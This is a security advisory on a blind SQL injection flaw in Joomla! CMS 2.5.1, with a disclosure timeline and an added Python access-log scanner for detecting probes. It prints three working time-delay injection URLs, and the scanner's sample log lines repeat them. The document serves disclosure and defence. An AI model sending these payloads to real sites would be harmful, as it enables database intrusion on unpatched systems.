Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.
Stratsec vulnerability researcher Sow Ching Shiong has discovered a blind SQL injection vulnerability in Joomla! CMS. The issue was discovered in a default installation of Joomla! CMS 2.5.1. Earlier versions may also be affected.
Proof-of-concept URLs that cause a time delay of 30 seconds are provided below:
- http://[target]/[path]/index.php/using-joomla/extensions/components/search-component/smart-search?Itemid=466&option=1&q=3&searchword=Search...&task=search'%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
- http://[target]/[path]/joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27
- http://[target]/[path]/joomla/index.php?option=1&searchword={searchTerms}&Itemid='%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
Solution
Update to version 2.5.2 or later.
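To check whether a site was probed with requests shaped like the proof-of-concept URLs above, the following added example (not part of the Stratsec advisory or the Joomla! code base) scans access log lines for a time-delay function or a non-numeric value in the Itemid and task parameters. The combined log format, the sample lines, the BENCHMARK pattern, the numeric-Itemid rule and all function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameters that carry the payload in the advisory's proof-of-concept URLs.
WATCHED = {"itemid", "task"}
# SLEEP( is the delay primitive used in the advisory; BENCHMARK( is an added
# assumption covering the other common MySQL time-delay function.
DELAY = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)
# Client address and request target from a combined-format access log line.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(param, reason)] for watched parameters in a request target."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query):
        if name.lower() not in WATCHED:
            continue
        value = unquote_plus(value)  # second pass catches double encoding
        if DELAY.search(value):
            hits.append((name, "time-delay function"))
        # Assumption: a legitimate Itemid is a numeric menu item id.
        elif name.lower() == "itemid" and not value.isdigit():
            hits.append((name, "non-numeric Itemid"))
    return hits

def scan(lines):
    """Return [(client, param, reason)] for every flagged log line."""
    found = []
    for line in lines:
        m = LINE.match(line)
        if m:
            found += [(m.group(1), p, r) for p, r in suspicious_params(m.group(2))]
    return found

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Mar/2012:10:00:01 +0000] "GET /index.php?option=com_content&Itemid=466 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Mar/2012:10:00:09 +0000] "GET /joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Mar/2012:10:01:02 +0000] "GET /index.php/smart-search?Itemid=466&q=3&task=search%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [06/Mar/2012:10:02:00 +0000] "GET /index.php?Itemid=abc HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for client, param, reason in scan(SAMPLE_LOG):
        print(f"{client}: {param}: {reason}")
```

A hit shows that a request of this shape was received, not that the injection succeeded; on a site still running 2.5.1 or earlier it is a reason to review the database and upgrade.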
References
Vendor URL: http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html
Stratsec: http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)
Disclosure Timeline
2012-02-29 - Vulnerability discovered.
2012-02-29 - Vulnerability reported to vendor.
2012-03-01 - Vendor acknowledged and confirmed the vulnerability.
2012-03-05 - Patch released.
2012-03-19 - Advisory published by Stratsec.